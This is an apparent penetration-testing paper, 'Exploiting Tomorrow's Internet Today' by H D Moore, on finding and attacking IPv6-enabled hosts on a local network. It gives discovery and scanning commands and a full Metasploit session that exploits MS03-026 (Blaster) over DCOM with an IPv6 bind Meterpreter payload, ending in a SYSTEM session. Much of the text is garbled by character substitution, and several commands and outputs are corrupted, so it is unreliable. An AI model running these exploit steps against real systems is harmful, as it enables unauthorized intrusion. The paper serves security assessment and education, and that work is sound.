Exploiting Tomorrow's Internet Today

Penetration Testing with IPv6

H D Moore <hdm[at]metasploit!om"
Introduction
Summary
This paper ill#strates how IPv6$ena%led systems with lin&$lo!al and a#to$!on'ig#red addresses !an %e
!ompromised #sing existing se!#rity tools (hile most o' the te!hni)#es des!ri%ed !an apply to *real+
IPv6 networ&s, the 'o!#s o' this paper is to target IPv6$ena%led systems on the lo!al networ&
Acknowledgments
The a#thor wo#ld li&e to than& -an Ha#ser o' TH. 'or his ex!ellent presentation at .an/e!(est 0112
and 'or releasing the IPv6 3tta!& Tool&it M#!h o' the %a!&gro#nd in'ormation in this paper is %ased on
notes 'rom -an Ha#ser's presentation The 'alive6' tool in!l#ded with the IPv6 3tta!& Tool&it is the
!riti!al 'irst step 'or all te!hni)#es des!ri%ed in this paper The a#thor wo#ld li&e to than& Philippe
4iondi 'or his wor& on /.3P5 and 'or his non$traditional 6$D presentation on IPv6 ro#ting headers at
.an/e!(est 0117
Background
The next iteration o' the IP proto!ol, version 6, has %een *8#st aro#nd the !orner+ 'or nearly 91 years
Migration deadlines have !ome and gone, networ&ing vendors have added s#pport, and all modern
operating systems are IPv6$ready The pro%lem is that 'ew organi:ations have any intention o'
implementing IPv6 The res#lt is that most !orporate networ&s !ontain ma!hines that have IPv6
networ&ing sta!&s, %#t have not %een intentionally !on'ig#red with IPv6 The IPv6 sta!& represents an
atta!& s#r'a!e that is o'ten overloo&ed in !orporate environments ;or example, many 'irewall prod#!ts,
s#!h as <one3larm on (indows and the standard IPTa%les on =in#x, do not %lo!& IPv6 tra''i! >IPTa%les
!an, %#t it #ses ?et'ilter6 r#les instead@ The goal o' this paper is to demonstrate how existing tools
!an %e #sed to !ompromise IPv6 ena%led systems
Operating System
3ll tools des!ri%ed in this paper were la#n!hed 'rom an A%#nt# =in#x B1C system I' yo# are #sing
Mi!roso't (indows, Ma! D/ E, 4/D, or another =in#x distri%#tion, some tools may wor& di''erently or
not at all
Configuration
3ll examples in this paper depend on the host system having a valid IPv6 sta!& along with a lin&$lo!al
or a#to$!on'ig#red IPv6 address This re)#ires the IPv6 '#n!tionality to %e !ompiled into the &ernel or
loaded 'rom a &ernel mod#le To determine i' yo#r system has an IPv6 address !on'ig#red 'or a
parti!#lar inter'a!e, #se the i'!on'ig !ommandF
# ifconfig eth0 | grep inet6
inet6 addr: fe80::0102:03ff:fe04:0506/64 Scope:Link
Addressing
IPv6 addresses !onsist o' 90B %its >96 %ytes@ and are represented as a gro#ps o' 'o#r hex digits
separated %y !olons 3 set o' two !olons >*FF+@ indi!ates that the %its leading #p to the next part o' the
address sho#ld %e all :ero ;or example, the IP address 'or the loop%a!&Glo!alhost !onsists o' 92 ?A==
%ytes 'ollowed %y one %yte set to the val#e o' 1x19 The representation 'or this address is simply *FF9+
>IPvC 907119@ The *any+ IPv6 address is represented as *FF1+ or 8#st *FF+ >IPvC 1111@ In the !ase
o' lin&$lo!al addresses, the pre'ix is always *'eB1FF+ 'ollowed %y the EAI$6C 'ormatted M3. address,
while a#to$!on'ig#red addresses always have the pre'ix o' *0111FF+ The *FF+ se)#en!e !an only %e
#sed on!e within an IPv6 address >it wo#ld %e am%ig#o#s otherwise@ The 'ollowing examples
demonstrate how the *FF+ se)#en!e is #sed
0000:0000:0000:0000:0000:0000:0000:0000 == ::, ::0, 0::0, 0:0::0:0
0000:0000:0000:0000:0000:0000:0000:0001 == ::1, 0::1, 0:0::0:0001
fe80:0000:0000:0000:0000:0000:0000:0060 == fe80::60
fe80:0000:0000:0000:0102:0304:0506:0708 == fe80::0102:0304:0506:0708
Link-local vs Site-local
Dn a given lo!al networ&, all IPv6 nodes have at least one lin&$lo!al address >'eB1FF@ D#ring the
a#tomati! !on'ig#ration o' IPv6 'or a networ& adapter, a lin&$lo!al address is !hosen, and an IPv6
ro#ter dis!overy re)#est is sent to the all$ro#ters %road!ast address I' any IPv6$ena%led ro#ter
responds, the node will also !hoose a site$lo!al address 'or that inter'a!e >0111FF@ The ro#ter response
indi!ates whether to #se DH.Pv6 or the EAI$6C algorithm to !hoose a site$lo!al address Dn networ&s
where there are no a!tive IPv6 ro#ters, an atta!&er !an reply to the ro#ter dis!overy re)#est and 'or!e
all lo!al IPv6 nodes to !on'ig#re a site$lo!al address
Discovery
Scanning
Anli&e the IPvC address spa!e, it is not 'easi%le to se)#entially pro%e IPv6 addresses in order to
dis!over live systems In real deployments, it is !ommon 'or ea!h endpoint to re!eive a 6C$%it networ&
range Inside that range, only one or two a!tive nodes may exist, %#t the address spa!e is over 'o#r
%illion times the si:e o' the entire IPvC Internet Trying to dis!over live systems with se)#ential pro%es
within a 6C$%it IP range wo#ld re)#ire at least 9B,CC6,7CC,176,71H,229,696 pa!&ets
Management
In order to manage hosts within large IPv6 networ& ranges, D?/ and other naming servi!es are
a%sol#tely re)#ired 3dministrators may %e a%le to remem%er an IPvC address within a s#%net, %#t
tra!&ing a 6C$%it host ID within a lo!al s#%net is a !hallenge 4e!a#se o' this re)#irement, D?/, (I?/,
and other name servi!es are !riti!al 'or managing the addresses o' IPv6 hosts /in!e the 'o!#s o' this
paper is on *a!!idental+ IPv6 networ&s, we will not %e !overing IPv6 dis!overy thro#gh host
management servi!es
eig!"or Discovery
The IPvC 3IP proto!ol goes away in IPv6 Its repla!ement !onsists o' the I.MPv6 ?eigh%or Dis!overy
>?D@ and I.MPv6 ?eigh%or /oli!itation >?/@ proto!ols ?eigh%or Dis!overy allows an IPv6 host to
dis!over the lin&$lo!al and a#to$!on'ig#red addresses o' all other IPv6 systems on the lo!al networ&
?eigh%or /oli!itation is #sed to determine i' a given IPv6 address exists on the lo!al s#%net The lin&$
lo!al address is g#aranteed to %e #ni)#e per$host, per$lin&, %y pi!&ing an address generated %y the
EAI$6C algorithm This algorithm #ses the networ& adapter M3. address to generate a #ni)#e IPv6
address ;or example, a system with a hardware M3. o' 19F10F16F1CF12F16 wo#ld #se a lin&$lo!al
address o' 'eB1FF1910F16;;F;E1CF1216 3n eight$%yte pre'ix is !reated %y ta&ing the 'irst three %ytes
o' the M3., appending ;;F;E, and then the next three %ytes o' the M3. In addition to lin&$lo!al
addresses, IPv6 also s#pports stateless a#to$!on'ig#ration /tateless a#to$!on'ig#red addresses #se
the *0111FF+ pre'ix More in'ormation a%o#t ?eigh%or Dis!overy !an %e 'o#nd in I;. 0C69
#!e I$v% Attack #oolkit
In order to en#merate lo!al hosts #sing the ?eigh%or Dis!overy proto!ol, we need a tool whi!h !an
send I.MPv6 pro%es and listen 'or responses The alive6 program in!l#ded with -an Ha#ser's IPv6
3tta!& Tool&it is the tool 'or the 8o% The example %elow demonstrates how to #se alive6 to dis!over
IPv6 hosts atta!hed to the networ& on the eth1 inter'a!e
# alive6 eth0
Alive: fe80:0000:0000:0000:xxxx:xxff:fexx:xxxx
Alive: fe80:0000:0000:0000:yyyy:yyff:feyy:yyyy
Found 2 sste!s alive
Linu& eig!"or Discovery #ools
The 'ip' !ommand, in !on8#n!tion with 'ping6', %oth in!l#ded with many re!ent =in#x distri%#tions, !an
also %e #sed to per'orm lo!al IPv6 node dis!overy The 'ollowing !ommands demonstrate this methodF
# ping6 "c # "$ eth0 ff02::% &/dev/null 2&'%
# ip neigh | grep (fe)0
fe80::211:43ff:fexx:xxxx dev eth0 lladdr 00:11:43:xx:xx:xx REACHABLE
fe80::21e:!ff:fexx:xxxx dev eth0 lladdr 00:1e:!:xx:xx:xx REACHABLE
fe80::218:8"ff:fexx:xxxx dev eth0 lladdr 00:18:8":xx:xx:xx REACHABLE
*+++,
Local Broadcast Addresses
IPv6 ?eigh%or Dis!overy relies on a set o' spe!ial %road!ast addresses in order to rea!h all lo!al nodes
o' a given type The ta%le %elow en#merates the most #se'#l o' these addresses
##01::1 -his address reaches all node"local $.v6 nodes
##02::1 -his address reaches all link"local $.v6 nodes
##05::1 -his address reaches all site"local $.v6 nodes
##01::2 -his address reaches all node"local $.v6 routers
##02::2 -his address reaches all link"local $.v6 routers
##05::2 -his address reaches all site"local $.v6 routers
I$v' vs I$v% Broadcasts
The IPvC proto!ol allowed pa!&ets destined to networ& %road!ast addresses to %e ro#ted a!ross the
Internet (hile this had some legitimate #ses, this 'eat#re was a%#sed 'or years %y tra''i! ampli'i!ation
atta!&s, whi!h spoo'ed a )#ery to a %road!ast address 'rom a vi!tim in order to sat#rate the vi!tim's
%andwidth with the responses (hile some IPvC servi!es were designed to wor& with %road!ast
addresses, this is the ex!eption and not the norm (ith the introd#!tion o' IPv6, %road!ast addresses
are no longer ro#ted o#tside o' the lo!al networ& This mitigates tra''i! ampli'i!ation atta!&s, %#t also
prevents a host 'rom sending ?eigh%or Dis!overy pro%es into remote networ&s
Dne o' the ma8or di''eren!es %etween IPvC and IPv6 is how networ& servi!es whi!h listen on the *any+
address >1111 G FF1@ handle in!oming re)#ests destined to the %road!ast address 3 good example o'
this is the 4I?D D?/ server (hen #sing IPvC and listening to 1111, D?/ re)#ests sent to the
networ& %road!ast address are simply ignored (hen #sing IPv6 and listening to FF1, D?/ re)#ests
sent to the lin&$lo!al all nodes %road!ast address >;;10FF9@ are pro!essed This allows a lo!al atta!&er
to send a message to all 4I?D servers on the lo!al networ& with a single pa!&et The same te!hni)#e
will wor& 'or any other ADP$%ased servi!e %o#nd to the FF1 address o' an IPv6$ena%led inter'a!e
w
/ d$% &eta'(l)$t*)& +##02::1
00 A1S234 S35-$61:
&eta'(l)$t*)&* 3600 ,- A 216*75*15*231
00 S34734: fe80::xxxx:xxxx:xxxx:xxxx82#9#:ff02::%@
Services
(sing map
The ?map port s!anner has s#pport 'or IPv6 targets, however, it !an only s!an these targets #sing the
native networ&ing li%raries and does not have the a%ility to send raw IPv6 pa!&ets This limits T.P port
s!ans to the *!onne!t>@+ method, whi!h while e''e!tive, is slow against 'irewalled hosts and re)#ires a
'#ll T.P !onne!tion to identi'y ea!h open port Even with these limitations, ?map is still the tool o'
!hoi!e 'or IPv6 port s!anning Dlder versions o' ?map did not s#pport s!anning lin&$lo!al addresses,
d#e to the re)#irement o' an inter'a!e s#''ix Trying to s!an a lin&$lo!al address wo#ld res#lt in the
'ollowing error
# n!ap "6 fe)0::;;;;:;;;;:;;;;:;;;;
Starting 1!ap 4+9# : http://insecure+org < at 200)"0)"2# %4:4) 5=-
Strange error fro! connect .22/:,0val$d ar%1&e0t
The pro%lem is that lin&$lo!al addresses are inter'a!e spe!i'i! In order to tal& to to the host at
'eB1FFxxxxFxxxxFxxxxFxxxx, we m#st indi!ate whi!h inter'a!e it is on as well The way to do this on the
=in#x plat'orm is %y appending a *J+ 'ollowed %y the inter'a!e name to the address In this !ase, we
wo#ld spe!i'y *'eB1FFxxxxFxxxxFxxxxFxxxxJeth1+ Ie!ent versions o' ?map >C6B@ now s#pport the
inter'a!e s#''ix and have no pro%lem s!anning lin&$lo!al IPv6 addresses /ite$lo!al addresses do not
re)#ire a s!ope ID s#''ix, whi!h ma&es them a little %it easier to #se 'rom an atta!&er's perspe!tive
>reverse !onne!t !ode doesn't need to &now the s!ope ID, 8#st the address@
# n!ap "6 fe)0::;;;;:;;;;:;;;;:;;;;8eth0
Starting 1!ap 4+6) : http://n!ap+org < at 200)"0)"2> %#:9> 5=-
.64- S-A-3 S347$53
22/tcp open ssh
(sing Metasploit
The development version o' the Metasploit ;ramewor& in!l#des a simple T.P port s!anner This mod#le
a!!epts a list o' hosts via the IHD/T/ parameter and a start and stop port The Metasploit ;ramewor&
has '#ll s#pport 'or IPv6 addresses, in!l#ding the inter'a!e s#''ix The 'ollowing example s!ans ports 9
thro#gh 91,111 on the target 'eB1FFxxxxFxxxxFxxxxFxxxx !onne!ted via inter'a!e eth1 This target is a
de'a#lt install o' -ista Home Premi#m
# !sfconsole
!sf& use au;iliar/discover/portscan/tcp
!sf au;iliar:tcp< & set 4?6S-S fe)0::;;;;:;;;;:;;;;:;;;;8eth0
!sf au;iliar:tcp< & set .64-S-A4- %
!sf au;iliar:tcp< & set .64-S-6. %0000
!sf au;iliar:tcp< & run
*@, -5. 6.31 fe)0:0000:0000:0000:;;;;:;;;;:;;;;:;;;;8eth0:%#9
*@, -5. 6.31 fe)0:0000:0000:0000:;;;;:;;;;:;;;;:;;;;8eth0:449
*@, -5. 6.31 fe)0:0000:0000:0000:;;;;:;;;;:;;;;:;;;;8eth0:%029
*@, -5. 6.31 fe)0:0000:0000:0000:;;;;:;;;;:;;;;:;;;;8eth0:%026
*@, -5. 6.31 fe)0:0000:0000:0000:;;;;:;;;;:;;;;:;;;;8eth0:%02>
*@, -5. 6.31 fe)0:0000:0000:0000:;;;;:;;;;:;;;;:;;;;8eth0:%02)
*@, -5. 6.31 fe)0:0000:0000:0000:;;;;:;;;;:;;;;:;;;;8eth0:%02A
*@, -5. 6.31 fe)0:0000:0000:0000:;;;;:;;;;:;;;;:;;;;8eth0:%040
*@, -5. 6.31 fe)0:0000:0000:0000:;;;;:;;;;:;;;;:;;;;8eth0:##)A
*@, -5. 6.31 fe)0:0000:0000:0000:;;;;:;;;;:;;;;:;;;;8eth0:9#9>
*@, Au;iliar !odule e;ecution co!pleted
In addition to T.P port s!anning, the Metasploit ;ramewor& also in!l#des a ADP servi!e dete!tion
mod#le This mod#le sends a series o' ADP pro%es to every host de'ined %y IHD/T/ and prints o#t any
responses re!eived This mod#le wor&s with any IPv6 address, in!l#ding the %road!ast ;or example,
the session %elow demonstrates dis!overy o' a lo!al D?/ servi!e that is listening on FF1 and responds
to re)#ests 'or the lin&$lo!al all nodes %road!ast address
# !sfconsole
!sf& use au;iliar/scanner/discover/sBeepCudp
!sf au;iliar:sBeepCudp< & set 4?6S-S ff02::%
!sf au;iliar:sBeepCudp< & run
*@, Sending > proDes to ff02:0000:0000:0000:0000:0000:0000:000% :% hosts<
*@, =iscovered =1S on fe)0::;;;;:;;;;:;;;;:;;;;8eth0
*@, Au;iliar !odule e;ecution co!pleted
)&ploits
I$v% )na"led Services
(hen !ond#!ting a penetration test against an IPv6 ena%led system, the 'irst step is to determine what
servi!es are a!!essi%le over IPv6 In the previo#s se!tion, we des!ri%ed some o' the tools availa%le 'or
doing this, %#t did not !over the di''eren!es %etween the IPvC and IPv6 inter'a!es o' the same
ma!hine .onsider the ?map res#lts %elow, the 'irst set is 'rom s!anning the IPv6 inter'a!e o' a
(indows 0116 system, while the se!ond is 'rom s!anning the same system's IPvC address
# n!ap "6 "p%"%0000 "n fe)0::24c:44ff:fe4f:%a448eth0
)0/tcp open http
%#9/tcp open !srpc
449/tcp open !icrosoft"ds
994/tcp open rtsp
%029/tcp open 1FS"or"$$S
%026/tcp open LSA"or"nter!
%02>/tcp open $$S
%0#0/tcp open iad%
%0#2/tcp open iad#
%0#4/tcp open unknoBn
%0#9/tcp open unknoBn
%0#6/tcp open unknoBn
%>99/tcp open B!s
A464/tcp open unknoBn
# n!ap "sS "p%"%0000 "n %A2+%6)+0+%4>
252t( )(e0 '&t(
422t( )(e0 0a&e'erver
532t( )(e0 d)&a$0
)0/tcp open http
1102t( )(e0 ()(3
%#9/tcp open !srpc
13!2t( )(e0 0et"$)'3''0
449/tcp open !icrosoft"ds
994/tcp open rtsp
%029/tcp open 1FS"or"$$S
%026/tcp open LSA"or"nter!
%02>/tcp open $$S
%0#0/tcp open iad%
%0#2/tcp open iad#
%0#4/tcp open unknoBn
%0#9/tcp open unknoBn
%0#6/tcp open unknoBn
%>99/tcp open B!s
338!2t( )(e0 &'3ter&3'erv
A464/tcp open unknoBn
D' the servi!es provided %y II/, only the we% server and streaming media servi!es appear to %e IPv6
ena%led The /MTP, PDP6, (I?/, ?et4ID/, and IDP servi!es were all missing 'rom o#r s!an o' the IPv6
address (hile this does limit the atta!& s#r'a!e on the IPv6 inter'a!e, the remaining servi!es are still
signi'i!ant in terms o' expos#re The /M4 port >CC2@ allows a!!ess to 'ile shares and remote 3PI !alls
thro#gh D.EIP. 3ll T.P D.EIP. servi!es are still availa%le, in!l#ding the endpoint mapper, whi!h
provides #s with a list o' D.EIP. appli!ations on this system The we% server >II/ 61@ is a!!essi%le,
along with any appli!ations hosted on this system The streaming media servi!es IT/P >22C@ and MM/
>9722@ provide a!!ess to the streaming !ontent and administrative inter'a!es
I$v% and *e" Browsers
(hile most modern we% %rowsers have s#pport 'or IPv6 addresses within the AI= %ar, there are
!ompli!ations ;or example, with the (indows 0116 system a%ove, we see that port B1 is open To
a!!ess this we% server with a %rowser, we #se the 'ollowing AI=F
htt(:224fe80::24:44ff:fe4f:1a445eth062
An'ort#nately, while ;ire'ox and Kon)#eror !an pro!ess this AI=, Internet Explorer >6 and 7@ !annot
/in!e this is a lin&$lo!al address, D?/ is not s#''i!ient, %e!a#se the lo!al s!ope ID is not re!ogni:ed in
the AI= 3n interesting di''eren!e %etween ;ire'ox 6 and Kon)#eror is how the Host header is !reated
when spe!i'ying a IPv6 address and s!ope ID (ith ;ire'ox 6, the entire address, in!l#ding the lo!al
s!ope ID is sent in the HTTP Host header This !a#ses II/ 61 to ret#rn an *invalid hostname+ error
%a!& to the %rowser However, Kon)#eror will strip the lo!al s!ope ID 'rom the Host header, whi!h
prevents II/ 'rom throwing the error message seen %y ;ire'ox
I$v% and *e" Assessments
Dne o' the !hallenges with assessing IPv6$ena%led systems is ma&ing existing se!#rity tools wor& with
the IPv6 address 'ormat >espe!ially the lo!al s!ope ID@ ;or example, the ?i&to we% s!anner is an
ex!ellent tool 'or we% assessments, %#t it does not have dire!t s#pport 'or IPv6 addresses (hile we
!an add an entry to Get!Ghosts 'or the IPv6 address we want to s!an and pass this to ?i&to, ?i&to is
#na%le to pro!ess the s!ope ID s#''ix The sol#tion to this and many other tool !ompati%ility iss#es is to
#se a T.PvC to T.Pv6 proxy servi!e 4y 'ar, the easiest tool 'or the 8o% is /o!at, whi!h is availa%le as a
pa!&age on most =in#x and 4/D distri%#tions To relay lo!al port B1B1 to remote port B1 on a lin&$lo!al
IPv6 address, we #se a !ommand li&e the one %elowF
/ socat -5."L$S-31:)0)0EreuseaddrEfork -5.6:*fe)0::24c:44ff:fe4f:%a448eth0,:)0
Dn!e /o!at is r#nning, we !an la#n!h ?i&to and many other tools against port B1B1 on 907119
/ +/nikto+pl "host %2>+0+0+% "port )0)0
" 1ikto v2+0#/2+04
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
F -arget $.: %2>+0+0+%
F -arget ?ostna!e: localhost
F -arget .ort: )0)0
F Start -i!e: 200)"%0"0% %2:9>:%)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
F Server: Gicrosoft"$$S/6+0
This port 'orwarding te!hni)#e wor&s 'or many other tools and proto!ols and is a great 'all$%a!& when
the tool o' !hoi!e does not s#pport IPv6 natively
)&ploiting I$v% Services
The Metasploit ;ramewor& has native s#pport 'or IPv6 so!&ets, in!l#ding the lo!al s!ope ID This allows
nearly all o' the exploit and a#xiliary mod#les to %e #sed against IPv6 hosts with no modi'i!ation In
the !ase o' we% appli!ation exploits, the -HD/T parameter !an %e #sed to override the Host header
sent %y the mod#le, avoiding iss#es li&e the one des!ri%ed a%ove
I$v% )na"led S!ellcode
To restri!t all exploit a!tivity to the IPv6 proto!ol, not only do the exploits need s#pport 'or IPv6, %#t
the payloads as well IPv6 payload s#pport is availa%le in Metasploit thro#gh the #se o' *stagers+ These
stagers !an %e #sed to !hain$load any o' the !ommon (indows payloads in!l#ded with the Metasploit
;ramewor& Dn!e again, lin&$lo!al addresses ma&e this pro!ess a little more !ompli!ated (hen #sing
the %indLipv6Lt!p stager to open a listening port on the target ma!hine, the IHD/T parameter m#st
have the lo!al s!ope ID appended 4y the same to&en, the reverseLipv6Lt!p stager re)#ires that the
=HD/T varia%le have remote ma!hine's inter'a!e n#m%er appended as a s!ope ID This !an %e tri!&y,
sin!e the atta!&er rarely &nows what inter'a!e n#m%er a given lin&$lo!al address !orresponds to ;or
this reason, the %indLipv6Lt!p stager is #ltimately more #se'#l 'or exploiting (indows ma!hines with
lin&$lo!al addresses The example %elow demonstrates #sing the %indLipv6Lt!p stager with the
Meterpreter stage The exploit in this !ase is M/16$166 >4laster@ and is delivered over the D.EIP.
endpoint mapper servi!e on port 962
!sf& 1'e 7$0d)7'2ex(l)$t2der(2&'0380268d)&
!sf e;ploit:!s0#C026Cdco!< & 'et RH9:; fe80::24:44ff:fe4f:1a445eth0
!sf e;ploit:!s0#C026Cdco!< & 'et <A=L9A> 7$0d)7'2&eter(reter2"$0d8$(v68t(
!sf e;ploit:!s0#C026Cdco!< & 'et L<9R; 4444
!sf e;ploit:!s0#C026Cdco!< & ex(l)$t
*@, Started Dind handler
*@, -ring target 2indoBs 1- S.#"6a/2000/H./200# Iniversal+++
*@, Jinding to 4dAf4aD)">d%c"%%cf")6%e"0020af6e>c9>:0+0KncacnCipCtcp:*+++,
*@, Jound to 4dAf4aD)">d%c"%%cf")6%e"0020af6e>c9>:0+0KncacnCipCtcp:*+++,*%#9,
*@, Sending e;ploit +++
*@, -he =534.5 service did not repl to our reLuest
*@, -rans!itting inter!ediate stager for over"siMed stage+++:%A% Dtes<
*@, Sending stage :2690 Dtes<
*@, Sleeping Defore handling stage+++
*@, Iploading =LL :>#22> Dtes<+++
*@, Ipload co!pleted+
*@, Geterpreter session % opened
!sf e;ploit:!s0#C026Cdco!< & 'e''$)0' 3$ 1
*@, Starting interaction Bith %+++
!eterpreter & %et1$d
Server userna!e: 1- AI-?64$-NOSNS-3G
Summary
+ey Concepts
Even tho#gh most networ&s are not *IPv6+ ready, many o' the ma!hines on those networ&s are The
introd#!tion o' a new proto!ol sta!& introd#!es se!#rity !hallenges that are not well$&nown and o'ten
overloo&ed d#ring se!#rity eval#ations The h#ge address range o' IPv6 ma&es remote dis!overy o'
IPv6 ma!hines di''i!#lt, %#t lo!al networ& dis!overy is still possi%le #sing the all$nodes %road!ast
addresses =in&$lo!al addresses are tied to a spe!i'i! networ& lin& and are only g#aranteed #ni)#e on
that networ& lin& where they reside In order to !omm#ni!ate with an IPv6 node #sing a lin&$lo!al
address, the #ser m#st have &nowledge o' the lo!al s!ope ID >inter'a!e@ 'or that lin& In order 'or a
remote appli!ation to !onne!t %a!& to the #ser over a lin&$lo!al address, the so!&et !ode m#st spe!i'y
the lo!al s!ope ID o' the !orre!t inter'a!e ADP servi!es whi!h listen on the IPv6 3?5 address >FF1@ will
respond to !lient re)#ests that are sent to the all$nodes %road!ast address >;;10FF9@, whi!h di''ers
'rom IPvC IPv6 %road!ast tra''i! is not ro#ta%le, whi!h limits many atta!&s to the lo!al networ& only
Even tho#gh many 'lavors o' =in#x, 4/D, and (indows now ena%le IPv6 %y de'a#lt, not all appli!ations
s#pport listening on the IPv6 inter'a!es /o'tware 'irewalls o'ten allow IPv6 tra''i! even when
!on'ig#red to %lo!& all IPvC tra''i! Imm#nity .3?-3/, the Metasploit ;ramewor&, the ?map /e!#rity
/!anner, and many other se!#rity tools now s#pport IPv6 targets It is possi%le to #se a tool written 'or
IPvC against an IPv6 host %y #sing a so!&et relay tool s#!h as xinetd or so!at
Conclusion
3ltho#gh the IPv6 %a!&%one in'rastr#!t#re !ontin#es to grow and an in!reasing n#m%er o' !lient
systems and devi!es s#pport IPv6 o#t o' the %ox, 'ew I/Ps are a%le to provide ro#ting %etween the
!#stomer site and the %a!&%one Antil this gap is !losed, se!#rity assessments against IPv6 addresses
will %e limited to the lo!al networ& The la!& o' awareness a%o#t IPv6 in most organi:ations !an provide
an easy way 'or an atta!&er to %ypass networ& !ontrols and 'ly #nder the radar o' many se!#rity
monitoring tools 3'ter all, when !on'ronted with the message %elow, what is an administrator to doM
La't l)%$0: :at 9t 1 11:32:45 2008 fr)& fe80::214:4fff:fe4a:3a305eth0
I$v% ,esources
)&ploits
TH. IPv6 3tta!& Tool&it $ httpFGG'reeworldth!orgGth!$ipv6G
The Metasploit ;ramewor& $ httpFGGmetasploit!om
Imm#nity .3?-3/ $ httpFGGwwwimm#nityse!!omG
#ools
n!at N svn !o svnFGGsvninse!#reorgGn!at >loginF g#estGg#est@
so!at N httpFGGwwwdest$#nrea!horgGso!atG
s!apy $ httpFGGwwwse!devorgGpro8e!tsGs!apyG
nmap $ httpFGGnmaporgG
ni&to $ httpFGGwww!irtnetGni&to0
Documentation
I;. 0C69 $ http://www.ietf.org/rfc/rfc2461.txt
D''i!ial IPv6 /ite $ httpFGGwwwipv6orgG
Application Compati"ility
httpFGGwwwdeepspa!e6netGdo!sGipv6Lstat#sLpageLappshtml
httpFGGwwwstind#striesnetGIPv6Gtoolshtml
httpFGGwwwipv6orgGv6$appshtml
httpFGGappli!ations6pa!&orgG%rowseGs#pportG